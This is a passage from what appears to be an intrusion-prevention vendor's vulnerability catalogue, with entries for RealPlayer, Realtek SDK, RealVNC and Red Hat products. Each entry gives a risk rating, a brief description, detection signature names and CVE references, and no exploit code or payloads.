There is a memory corruption vulnerability in the RealNetworks RealPlayer ActiveX control. The control is implemented in rmoc3260.dll. The flaw is due to a boundary error in the set/get mechanism of certain properties of these controls. Remote attackers can exploit this vulnerability by persuading the target user to view a malicious web page. Successful attack can allow for arbitrary code execution with the privileges of the currently logged on user.

Situation:

HTTP_SS-RealNetworks-RealPlayer-rmoc3260.dll-ActiveX-Control-Memory-Corruption
File-Text_RealNetworks-RealPlayer-rmoc3260.dll-ActiveX-Control-Memory-Corruption

References:

CVE-2008-1309
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1309

BID-28157
http://www.securityfocus.com/bid/28157

RealNetworks-RealPlayer-Rmp-File-Heap-Buffer-Overflow

About this vulnerability:

A vulnerability in RealNetworks RealPlayer

Risk:

Moderate

First detected in:

sgpkg-ips-558-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

RealPlayer

Type:

Buffer Overflow

Description:

There is a heap buffer overflow in RealNetworks RealPlayer. The vulnerability is due an error when handling RMP files, overly long values for certain tags can result in a heap buffer overflow. A remote unauthenticated attacker could exploit this vulnerability by enticing a user to open a crafted RMP file. Successful exploitation could result in arbitrary code execution in the context of the currently logged in user.

Situation:

File-Text_RealNetworks-RealPlayer-Rmp-File-Heap-Buffer-Overflow
File-TextId_RealNetworks-RealPlayer-Rmp-File-Heap-Buffer-Overflow

References:

CVE-2013-6877
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-6877

BID-64398
http://www.securityfocus.com/bid/64398

OSVDB-101135
http://www.osvdb.org/101135

RealNetworks-RealPlayer-Rmp-File-Stack-Buffer-Overflow

About this vulnerability:

A vulnerability in RealNetworks RealPlayer

Risk:

High

First detected in:

sgpkg-ips-560-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

RealPlayer

Type:

Buffer Overflow

Description:

A stack buffer overflow exists in RealNetworks RealPlayer. The vulnerability is due an error when handling RMP files. Incorrect handling of the 'version' and 'encoding' attributes of the XML declaration tag can result in a stack buffer overflow. A remote unauthenticated attacker could exploit this vulnerability by enticing a user to open a crafted RMP file. Successful exploitation could result in arbitrary code execution in the context of the currently logged in user.

Situation:

File-TextId_RealNetworks-RealPlayer-Rmp-File-Stack-Buffer-Overflow

References:

CVE-2013-7260
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-7260

BID-64398
http://www.securityfocus.com/bid/64398

OSVDB-101356
http://www.osvdb.org/101356

RealNetworks-RealPlayer-SMIL-XSS

About this vulnerability:

A vulnerability in RealNetworks RealPlayer

Risk:

High

First detected in:

sgpkg-ips-409-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

RealPlayer

Type:

Cross-site Scripting

Description:

An XSS (Cross Site Scripting) Vulnerability exists in the RealPlayer's handling of SMIL (Synchronized Multimedia Integration Language) metafiles. This allows a malicious entity to attack vulnerable RealPlayer clients. A similar vulnerability was discovered in August 2003; the current issue is a variant of its predecessor. The attacked target will execute the malicious Javascript bundled with the SMIL file. This may allow the attacker to access sensitive data on the victims local system, such as cookie information for a particular website. It could also download to the victim other resources specified by the attacker. The saved files could be used by other exploits, which could in turn be used to mount further attacks.

Situation:

File-TextId_JavaScript-In-SMIL-XSS

References:

CVE-2003-0726
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0726

BID-8453
http://www.securityfocus.com/bid/8453

RealNetworks-RealPlayer-SWF-Flash-File-Buffer-Overflow

About this vulnerability:

A vulnerability in RealNetworks Rhapsody Player

Risk:

Moderate

First detected in:

sgpkg-ips-436-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

RealPlayer

Type:

Buffer Overflow

Description:

There is a buffer overflow vulnerability in the RealNetworks RealPlayer product. The vulnerability is specific to parsing malformed Macromedia Flash (SWF) files. An attacker can exploit this vulnerability to inject and execute arbitrary code with the privileges of the currently logged in user. In an attack attempt which results in successful code execution, the process flow of the vulnerable application will be diverted to attacker supplied code. The result of such an attack is entirely dependent on the purpose of the injected code. In an unsuccessful attack attempt, the affected application will terminate. It should be noted that due to the nature of the flaw, an attack will generally be unsuccessful in injecting and executing code.

Situation:

File-Flash_RealNetworks-RealPlayer-SWF-Flash-File-Buffer-Overflow

References:

CVE-2006-0323
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-0323

BID-17202
http://www.securityfocus.com/bid/17202

RealNetworks-RealPlayer-URL-Parsing-Stack-Buffer-Overflow

About this vulnerability:

A vulnerability in RealNetworks RealPlayer

Risk:

Moderate

First detected in:

sgpkg-ips-501-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

RealPlayer

Type:

Buffer Overflow

Description:

There is a stack buffer overflow vulnerability in RealNetworks RealPlayer. The vulnerability is due to insufficient sanitation of the URLs while parsing RealMedia files. An attacker can exploit this vulnerability by enticing a user to open a specially crafted Microsoft .url file, possibly embedded in a web page, that has an extension associated with RealPlayer such as .ram or .ra, with the affected application. Successful exploitation can result in arbitrary code execution in the context of the currently logged in user. Unsuccessful exploitation could result in the application terminating abnormally.

Situation:

File-TextId_RealNetworks-RealPlayer-URL-Parsing-Stack-Buffer-Overflow

References:

CVE-2012-5691
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-5691

BID-56956
http://www.securityfocus.com/bid/56956

OSVDB-88486
http://www.osvdb.org/88486

RealNetworks-RealPlayer-WAV-File-Processing-Buffer-Overflow

About this vulnerability:

A vulnerability in Helix Community Helix Player

Risk:

Moderate

First detected in:

sgpkg-ips-416-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Helix Player

Type:

Malfunction

Description:

There is a flaw in the way RealPlayer processes files encoded using the WAVE format. The vulnerability occurs when RealPlayer attempts to parse a crafted WAV file with an incorrect LIST chunk. An attacker can exploit this vulnerability to inject and execute arbitrary code with the privileges of the currently logged in user. When code injection and execution are successful, the behavior of the target system depends on the nature the injected code. Any code injected into the vulnerable component executes in the security context of the current user. If code injection fails, the RealPlayer application will likely terminate.

Situation:

File-RIFF_RealNetworks-RealPlayer-WAV-File-Processing-Buffer-Overflow
File-RIFF_RealNetworks-RealPlayer-WAV-File-Processing-Buffer-Overflow-Over-SMTP

References:

CVE-2005-0611
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0611

BID-12697
http://www.securityfocus.com/bid/12697

RealNetworks-SMIL-Wallclock-Stack-Overflow

About this vulnerability:

A stack overflow vulnerability in RealNetworks Helix Player and RealPlayer

Risk:

High

First detected in:

sgpkg-ips-113-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Helix Player; RealPlayer

Type:

Buffer Overflow

Description:

There is a buffer overflow vulnerability in RealNetworks Helix Player and RealPlayer. The vulnerability is due to the way these products parse a specific time format in Synchronized Multimedia Integration Language (SMIL) data. A remote attacker can exploit this vulnerability by persuading the target user to visit a malicious website or open a crafted file. Successful exploitation can allow execution of arbitrary code in the context of the logged-in user.

Situation:

HTTP_RealNetworks-SMIL-Wallclock-Stack-Overflow
File-TextId_RealNetworks-SMIL-Wallclock-Stack-Overflow

References:

CVE-2007-3410
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3410

BID-24658
http://www.securityfocus.com/bid/24658

OSVDB-37374
http://www.osvdb.org/37374

RealPlayer-Malformed-RM-File-Heap-Overflow

About this vulnerability:

A vulnerability in RealPlayer

Risk:

High

First detected in:

sgpkg-ips-409-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

RealPlayer

Type:

Buffer Overflow

Description:

A vulnerability exists in the way that RealNetworks RealPlayer products handle specially crafted media files. An RM media file containing a very large data segment length, when opened by a vulnerable player, can cause a heap-based buffer to be overrun . An attacker exploiting this vulnerability can execute arbitrary code or cause a denial of service.

Situation:

File-Binary_RealPlayer-Malformed-RM-File-Heap-Overflow

References:

BID-11309
http://www.securityfocus.com/bid/11309

RealPlayer-Url-Parsing-Buffer-Overflow

About this vulnerability:

A vulnerability in RealPlayer

Risk:

High

First detected in:

sgpkg-ips-420-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

RealPlayer

Type:

Buffer Overflow

Description:

There is a vulnerability in the way RealNetworks' RealPlayer products handle the parsing of URLs. A heap buffer overflow can occur when parsing a URL with a large number of period characters. Using a specially crafted URL, an attacker can exploit this vulnerability to remotely execute arbitrary code.

Situation:

File-Text_RealPlayer-Url-Parsing-Buffer-Overflow

References:

CVE-2004-0550
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0550

BID-10527
http://www.securityfocus.com/bid/10527

RealPlayer-Vidplin.dll-AVI-Header-Parsing-Code-Execution

About this vulnerability:

A vulnerability in RealNetworks RealPlayer

Risk:

High

First detected in:

sgpkg-ips-383-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

RealPlayer; RealPlayer SP

Type:

Buffer Overflow

Description:

A vulnerability has been reported in RealNetworks's Realplayer.

Situation:

HTTP_SS-RealPlayer-Vidplin.dll-AVI-Header-Parsing-Code-Execution
File-RIFF_RealPlayer-Vidplin.dll-AVI-Header-Parsing-Code-Execution

References:

CVE-2010-4393
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-4393

BID-46047
http://www.securityfocus.com/bid/46047

OSVDB-70682
http://www.osvdb.org/70682

Realtek-Media-Player-Playlist-Buffer-Overflow

About this vulnerability:

A buffer overflow vulnerability in Realtek Media Player.

Risk:

High

First detected in:

sgpkg-ips-665-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Realtek Media Player

Type:

Buffer Overflow

Description:

A buffer overflow vulnerability in Realtek Media Player 1.15.0.0 which allows remote attackers to execute arbitrary code via a crafted playlist.

Situation:

File-Binary_Realtek-Media-Player-Playlist-Buffer-Overflow

References:

CVE-2008-5664
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5664

BID-32860
http://www.securityfocus.com/bid/32860

OSVDB-50715
http://www.osvdb.org/50715

Realtek-SDK-formSysCmd-Command-Execution-CVE-2021-35395

About this vulnerability:

A vulnerability in Realtek SDK

Risk:

High

First detected in:

sgpkg-ips-1381-5242

Last changed:

sgpkg-ips-1381-5242

Platform:

Generic

Software:

Realtek SDK

Type:

Code Injection

Description:

A command execution vulnerability has been reported in the Realtek SDK web management interface. This vulnerability is due to formSysCmd form feature which allows users to run system commands. A successful exploitation of this vulnerability may allow an unauthenticated attacker to execute arbitrary code.

Situation:

HTTP_CRL-Realtek-SDK-formSysCmd-Command-Execution-CVE-2021-35395

References:

CVE-2021-35395
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-35395

Realtek-SDK-formWsc-Command-Injection-CVE-2021-35395

About this vulnerability:

A vulnerability in Realtek SDK

Risk:

High

First detected in:

sgpkg-ips-1380-5242

Last changed:

sgpkg-ips-1380-5242

Platform:

Generic

Software:

Realtek SDK

Type:

Input Validation

Description:

A command injection vulnerability has been reported in the Realtek SDK web management interface via formWsc's peerPin parameter. A successful exploitation of this vulnerability may allow an unauthenticated attacker to execute arbitrary code.

Situation:

HTTP_CRL-Realtek-SDK-formWsc-Command-Injection-CVE-2021-35395

References:

CVE-2021-35395
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-35395

Realtek-SDK-Miniigd-OS-Command-Injection

About this vulnerability:

A Realtek SDK miniigd OS Command Injection vulnerability.

Risk:

High

First detected in:

sgpkg-ips-695-5211

Last changed:

sgpkg-ips-1323-5242

Platform:

Generic

Software:

Realtek SDK

Type:

Code Injection

Description:

Realtek SDK using the miniigd SOAP service are vulnerable to OS command injections via a crafted NewInternalClient request.

Situation:

HTTP_CRL-Realtek-SDK-Miniigd-OS-Command-Injection
File-TextId_Realtek-SDK-Miniigd-OS-Command-Injection

References:

CVE-2014-8361
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8361

Realtek-SDK-MP-Daemon-UDPServer-Command-Injection-CVE-2021-35394

About this vulnerability:

A vulnerability in Realtek SDK

Risk:

High

First detected in:

sgpkg-ips-1380-5242

Last changed:

sgpkg-ips-1380-5242

Platform:

Generic

Software:

Realtek SDK

Type:

Input Validation

Description:

A command injection vulnerability has been reported in the Realtek SDK diagnostic tool MP Daemon. A successful exploitation of this vulnerability may allow an unauthenticated attacker to execute arbitrary code.

Situation:

Generic_UDP-Realtek-SDK-MP-Daemon-UDPServer-Command-Injection-CVE-2021-35394

References:

CVE-2021-35394
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-35394

Realtek-SDK-SIP-ALG-Buffer-Overflow

About this vulnerability:

A vulnerability in the Realtek SDK

Risk:

High

First detected in:

sgpkg-ips-1494-5242

Last changed:

sgpkg-ips-1494-5242

Platform:

Generic

Software:

Realtek SDK

Type:

Input Validation

Description:

Impoper processing of SIP messages causes a buffer overflow in products with code from the Realtek SDK. A successful exploit allows an attacker to execute arbitrary code on the target system.

Situation:

SIP-UDP_Realtek-SDK-SIP-ALG-Buffer-Overflow

References:

CVE-2022-27255
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-27255

Realtek-SDK-Stack-Buffer-Overflow-Vulnerabilities-CVE-2021-35395

About this vulnerability:

A vulnerability in Realtek SDK

Risk:

High

First detected in:

sgpkg-ips-1380-5242

Last changed:

sgpkg-ips-1380-5242

Platform:

Generic

Software:

Realtek SDK

Type:

Buffer Overflow

Description:

Multiple stack-based buffer overflow vulnerabilities have been reported in the Realtek SDK web management interface. A successful exploitation of these vulnerabilities may allow an unauthenticated attacker to execute arbitrary code.

Situation:

HTTP_CRL-Realtek-SDK-Stack-Buffer-Overflow-Vulnerabilities-CVE-2021-35395

References:

CVE-2021-35395
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-35395

Realtek-SDK-UPnP-Callback-Stack-Buffer-Overflow-CVE-2021-35392

About this vulnerability:

A vulnerability in Realtek SDK

Risk:

High

First detected in:

sgpkg-ips-1380-5242

Last changed:

sgpkg-ips-1380-5242

Platform:

Generic

Software:

Realtek SDK

Type:

Buffer Overflow

Description:

A stack buffer overflow vulnerability has been reported in the Realtek SDK via UPnP SUBSCRIBE Callback header. A successful exploitation of this vulnerability may allow an unauthenticated attacker to execute arbitrary code.

Situation:

HTTP_CSH-Realtek-SDK-UPnP-Callback-Stack-Buffer-Overflow-CVE-2021-35392

References:

CVE-2021-35392
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-35392

RealVNC-Authentication-Bypass

About this vulnerability:

Authentication bypass vulnerability in RealVNC

Risk:

Moderate

First detected in:

sgpkg-ips-68-1314

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

RealVNC Free Edition; RealVNC Personal Edition; RealVNC Enterprise Edition

Type:

Malfunction

Description:

RealVNC server has a vulnerability in the authentication process. The server does not correctly validate the authentication method chosen by the client. A remote attacker is able to exploit this vulnerability to connect to a RealVNC server without authentication.

Situation:

RFB-Client-Bad-Handshake-Message-Sequence
RFB-Client-Bad-Security-Option
Generic_RealVNC-Authentication-Required
Generic_RealVNC-Connection-Attempt-Without-Authentication
Generic_RealVNC-Authentication-Bypass-Command-Execution

References:

CVE-2006-2369
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2369

BID-17978
http://www.securityfocus.com/bid/17978

OSVDB-25479
http://www.osvdb.org/25479

RealVNC-Server-ClientCutText-Message-Memory-Corruption

About this vulnerability:	A vulnerability in RealVNC
Risk:	High
First detected in:	sgpkg-ips-304-4219
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	RealVNC
Type:	Malfunction
Description:	There is a vulnerability in RealVNC Server. The vulnerability is due to insufficient boundary checks when handling ClientCutText messages sent from RealVNC clients. Remote authenticated attackers could exploit this vulnerability by sending a crafted ClientCutText VNC command. Successful exploitation of this vulnerability may lead to injection and execution of arbitrary code within the context of SYSTEM user.
Situation:	RFB_CS-RealVNC-Server-ClientCutText-Message-Memory-Corruption

Recslurp-Botnet

About this vulnerability:	Recslurp botnet
Risk:	High
First detected in:	sgpkg-ips-753-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	<os>
Type:	Code Injection
Description:	Recslurp is a malicious spambot.
Situation:	Generic_SS-Recslurp-Botnet-Traffic Generic_CS-Recslurp-Botnet-Traffic

Red-Hat-389-Directory-Server-Do_Search-Denial-Of-Service

About this vulnerability:

A vulnerability in Red Hat 389 Directory Server

Risk:

Moderate

First detected in:

sgpkg-ips-1121-5242

Last changed:

sgpkg-ips-1654-5242

Platform:

Generic

Software:

Red Hat 389 Directory Server

Type:

Malfunction

Description:

There has been reported a denial-of-service vulnerability in 389 Directory Server. Successful exploitation of the vulnerability could lead to denial of service conditions.

Situation:

LDAP_CS-Red-Hat-389-Directory-Server-Do_Search-Denial-Of-Service
LDAP_CS-Red-Hat-389-Directory-Server-Do_Search-Denial-Of-Service-2

References:

CVE-2018-14648
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14648

Red-Hat-389-Directory-Server-NS-Slapd-ldapsearch-Buffer-Overflow

About this vulnerability:

A vulnerability in Red Hat 389 Directory Server

Risk:

High

First detected in:

sgpkg-ips-1131-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Red Hat 389 Directory Server

Type:

Buffer Overflow

Description:

A stack buffer overflow vulnerability has been discovered in 389 Directory Server. The vulnerability is due to improper handling of overly long filter values within ldapsearch queries. A remote attacker can issue a crafted query in order to trigger the vulnerability and cause cause arbitrary code execution with the privileges of the ns-slapd daemon. An unsuccessful attack will cause the ns-slapd daemon to abnormally terminate.

Situation:

LDAP_CS-Red-Hat-389-Directory-Server-NS-Slapd-ldapsearch-Buffer-Overflow

References:

CVE-2018-1089
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-1089

BID-104137
http://www.securityfocus.com/bid/104137

Red-Hat-389-Directory-Server-Server-Side-Sort-Denial-Of-Service

About this vulnerability:

A vulnerability in Red Hat 389 Directory Server

Risk:

Moderate

First detected in:

sgpkg-ips-1107-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Red Hat 389 Directory Server

Type:

Input Validation

Description:

Improper processing of LDAP search queries that specify the server-side-sort extension causes a denial of service vulnerability in Red Hat 389 Directory Server. A successful exploit allows an attacker to terminate the service.

Situation:

LDAP_CS-Red-Hat-389-Directory-Server-Server-Side-Sort-Denial-Of-Service

References:

CVE-2018-10935
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-10935

Red-Hat-389-Directory-Server-TLS-Resource-Exhaustion

About this vulnerability:

A vulnerability in Red Hat 389 Directory Server

Risk:

High

First detected in:

sgpkg-ips-1153-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Red Hat Linux

Software:

Red Hat 389 Directory Server

Type:

Resource Starvation

Description:

A vulnerability in Red Hat 389 Directory Server, versions 1.4.1.2 and before, which allows remote attackers to cause a denial of service condition by sending a large number of LDAP requestsover TLS to a vulnerable server causing all the worker threads to be blocked, due to improper processing of LDAP requests over TLS.

Situation:

TLS_CS-Red-Hat-389-Directory-Server-TLS-Resource-Exhaustion

References:

CVE-2019-3883
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-3883

Red-Hat-389-Directory-Server-Vslapd_Log_Emergency_Error-Denial-Of-Service

About this vulnerability:

A vulnerability in Red Hat 389 Directory Server

Risk:

Moderate

First detected in:

sgpkg-ips-1108-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Red Hat 389 Directory Server

Type:

Input Validation

Description:

Improper use of the lock controlling the error log causes a denial of service vulnerability in Red Hat 389 Directory Server.

Situation:

LDAP_CS-Red-Hat-389-Directory-Server-Vslapd_Log_Emergency_Error-Denial-Of-Service

References:

CVE-2018-14624
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14624

Red-Hat-Cachemgr-Cgi-Script

About this vulnerability:

Red Hat Squid cachemgr.cgi script

Risk:

Moderate

First detected in:

sgpkg-ips-1-1102

Last changed:

sgpkg-ips-1296-5242

Platform:

Red Hat Linux 6

Software:

Squid; Apache

Type:

Insecure Configuration

Description:

Red Hat Linux 5.2 and 6.0 have the cachemgr.cgi script accessible from the Squid proxy by default. This script can be used to scan other hosts for open ports from the vulnerable host, which may also be located behind a firewall.

Situation:

HTTP_CSU-Redhat-Apache-Cachemgr-Cgi

References:

CVE-1999-0710
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0710

BID-2059
http://www.securityfocus.com/bid/2059

Red-Hat-CloudForms-Management-Engine-Directory-Traversal

About this vulnerability:

A Red Hat CloudForms Management Engine Directory Traversal vulnerability.

Risk:

High

First detected in:

sgpkg-ips-702-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Red Hat CloudForms

Type:

Directory Traversal

Description:

Multiple directory traversal vulnerabilities in Red Hat CloudForms Management Engine 2.0 which allow remote attackers to create and overwrite arbitrary files via the filename parameter to the log, upload, or linuxpkgs method.

Situation:

HTTP_CRL_Red-Hat-CloudForms-Management-Engine-Directory-Traversal

References:

CVE-2013-2068
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2068

Red-Hat-CloudForms-Management-Engine-SQL-Injection

About this vulnerability:

A Red Hat CloudForms Management Engine SQL Injection vulnerability.

Risk:

High

First detected in:

sgpkg-ips-700-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Red Hat CloudForms

Type:

Input Validation

Description:

A vulnerability in Red Hat CloudForms Management Engine, version 2.0, which allows remote attackers to access and modify data via SQL injections in the profile parameter in the explorer action.

Situation:

HTTP_CSU-SQL-Injection-End-Of-Line-Comments

References:

CVE-2013-2050
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2050

BID-64524
http://www.securityfocus.com/bid/64524

Red-Hat-Directory-Server-Accept-Language-Parsing-Buffer-Overflow

About this vulnerability:

A vulnerability in Red Hat Directory Server

Risk:

Moderate

First detected in:

sgpkg-ips-410-4219

Last changed:

sgpkg-ips-1588-5242

Platform:

Generic

Software:

Red Hat Directory Server

Type:

Buffer Overflow

Description:

There exists a buffer overflow vulnerability in Red Hat Directory Server. The flaw is due to improper data validation in the Administrator Web Interface component. A remote attacker can trigger this vulnerability by sending crafted HTTP request to the affected service, potentially inject and execute arbitrary code with root level privileges. In a sophisticated attack case where code injection is successful, the behaviour of the target is entirely dependent on the intended function of the injected code. The code in such a case would execute within the security context of the affected service, which is normally the root. In an attack case where code injection is not successful, the affected CGI application will terminate abnormally.

Situation:

HTTP_CSH-Red-Hat-Directory-Server-Accept-Language-Parsing-Buffer-Overflow

References:

CVE-2008-2928
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2928

BID-30869
http://www.securityfocus.com/bid/30869

Red-Hat-Enterprise-Linux-DNS-Resolver-Buffer-Overflow

About this vulnerability:

A vulnerability in GNU C Library Project GNU C Library

Risk:

High

First detected in:

sgpkg-ips-626-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Red Hat Linux; Red Hat Enterprise Linux

Software:

<os>

Type:

Malfunction

Description:

A vulnerability exists in the DNS stub resolver library in ISC BIND that also affects the resolver component of older versions of the glibc library. This vulnerability has been known for some time, but has gone unfixed in several versions of the Red Hat Linux operating systems until recently. This can allow an attacker to send a malicious DNS response packets to a vulnerable system to cause a denial of service condition or execution of arbitrary code. As noted in section 4.1 "Technical Mechanisms", it is difficult for an attacker to exploit this vulnerability to create a denial of service condition or execute arbitrary code. If a sophisticated attacker can craft such an exploit, then in the denial of service case, the process using the glibc resolver library is expected to terminate with a memory access violation. This can result in a denial of service condition if the process which terminated was acting as a local or network service. In a code injection attack, the behaviour of the attack target is dependant on the nature of the injected code. The injected code would be executed in the security context of the process which made the DNS query.

Situation:

DNS-UDP_Red-Hat-Enterprise-Linux-DNS-Resolver-Buffer-Overflow

References:

CVE-2002-0029
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0029

BID-6186
http://www.securityfocus.com/bid/6186

Red-Hat-Installation-Package

About this vulnerability:	Red Hat binary installation package
Risk:	Low
First detected in:	sgpkg-ips-188-2032
Last changed:	sgpkg-ips-1296-5242
Platform:	Red Hat Linux; Fedora Linux; Mandrake Linux; SUSE Linux
Software:	<os>
Type:	Insecure Configuration
Description:	The Red Hat distribution, as well as other Linux distributions that are based on Red Hat, such as Fedora, use specific binary packages for application installation. These installation packages can be used to import executable content into the target system.
Situation:	HTTP_SS-Red-Hat-Binary-Installation-Package-Download File-Binary_Red-Hat-Binary-Installation-Package

Red-Hat-Jboss-Application-Server-Dofilter-Insecure-Deserialization

About this vulnerability:

A vulnerability in Red Hat JBoss Enterprise Application Platform

Risk:

Moderate

First detected in:

sgpkg-ips-1020-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Red Hat JBoss Enterprise Application Platform

Type:

Malfunction

Description:

There is a deserialization vulnerability in Red Hat JBoss Application server. A remote, unauthenticated attacker can exploit this vulnerability and run arbitrary code in the system.

Situation:

File-Binary_Red-Hat-Jboss-Application-Server-Dofilter-Insecure-Deserialization

References:

CVE-2017-12149
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-12149

Red-Hat-Jboss-Bpm-Suite-Brms-Tasks-List-Cross-Site-Scripting

About this vulnerability:

A vulnerability in Red Hat JBoss BPMS

Risk:

Moderate

First detected in:

sgpkg-ips-913-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

JBoss

Type:

Input Validation

Description:

Insufficient validation of HTTP request data in the Tasks List component of JBoss causes a cross-site scripting vulnerability, which can be exploited to gain the ability to execute arbitrary scripts in the user's web browser.

Situation:

HTTP_CS-Red-Hat-Jboss-Bpm-Suite-Brms-Tasks-List-Cross-Site-Scripting

References:

CVE-2017-2674
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-2674

Red-Hat-Jboss-Data-Grid-Hotrod-Client-Insecure-Deserialization

About this vulnerability:

A vulnerability in Red Hat JBoss Data Grid

Risk:

Moderate

First detected in:

sgpkg-ips-1070-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Red Hat JBoss Data Grid

Type:

Input Validation

Description:

There has been reported an insecure deserialization vulnerability in the Hotrod client. Successful exploitation can result in arbitrary code execution.

Situation:

Generic_CS-Red-Hat-Jboss-Data-Grid-Hotrod-Client-Insecure-Deserialization

References:

CVE-2017-15089
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-15089

Red-Hat-Jboss-Seam-Framework-Xxe-Information-Disclosure

About this vulnerability:

A vulnerability in Red Hat JBoss Seam

Risk:

Moderate

First detected in:

sgpkg-ips-563-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Red Hat JBoss Enterprise Application Platform

Type:

Malfunction

Description:

An information disclosure vulnerability has been reported in Red Hat JBoss Seam Framework. This is due to an incorrectly configured XML parser accepting XML eXternal Entities (XXE) from untrusted sources being used by the ExecutionHandler, PollHandler, and SubscriptionHandler classes within the JBoss Seam Framework's Remoting component. A remote unauthenticated attacker may exploit this vulnerability on a web application powered by the JBoss Seam Framework to disclose the contents of files via specially crafted XML documents.

Situation:

HTTP_CS-Red-Hat-Jboss-Seam-Framework-Xxe-Information-Disclosure

References:

CVE-2013-6447
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-6447

BID-65051
http://www.securityfocus.com/bid/65051

OSVDB-102345
http://www.osvdb.org/102345

Red-Hat-Jboss-Seam-Interfacegenerator-Information-Disclosure

About this vulnerability:

A vulnerability in Red Hat JBoss Seam

Risk:

Moderate

First detected in:

sgpkg-ips-563-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Red Hat JBoss Enterprise Application Platform

Type:

Malfunction

Description:

An information disclosure vulnerability exists in Red Hat JBoss Seam Framework. This is due to a design flaw in the InterfaceGenerator handler that allows it to expose details of all classes on the server's classpath. A remote unauthenticated attacker may exploit this vulnerability on a web application powered by the JBoss Seam Framework to determine which classes are deployed on the server.

Situation:

HTTP_CSU-Red-Hat-Jboss-Seam-Interfacegenerator-Information-Disclosure

References:

CVE-2013-6448
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-6448

BID-65049
http://www.securityfocus.com/bid/65049

OSVDB-102344
http://www.osvdb.org/102344

Red-Hat-librelp-Stack-Buffer-Overflow

About this vulnerability:

A vulnerability in Red Hat librelp

Risk:

High

First detected in:

sgpkg-ips-1122-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Red Hat Enterprise Linux

Software:

<os>

Type:

Buffer Overflow

Description:

A vulnerability in Red Hat librelp, versions prior to 1.2.15, which allows remote attackers to execute code by sending a crafted Reliable Event Logging Protocol message, due to the incorrect sanitisation of x509 certificates.

Situation:

HTTPS_CS-Red-Hat-librelp-Stack-Buffer-Overflow

References:

CVE-2018-1000140
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-1000140

Red-Hat-Netkvm-Virtio-Win-GetXxpHeaderAndPayloadLen-Integer-Underflow

About this vulnerability:

A vulnerability in Red Hat virtio-win

Risk:

High

First detected in:

sgpkg-ips-657-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Red Hat Linux

Software:

<os>

Type:

Integer Overflow

Description:

A denial of service vulnerability has been reported in Red Hat virtio-win NetKVM driver. The vulnerability is due to a failure to sufficiently sanitize the length of incoming IP packets. A remote unauthenticated attacker could exploit this vulnerability by sending a specially crafted IP packet to a server. Successful exploitation could lead to a denial of service condition.

Situation:

IP_Length-Total-Error
IP_Length-Total-Error
IPv6_Extension-headers-incomplete
IPv6_Extension-headers-incomplete

References:

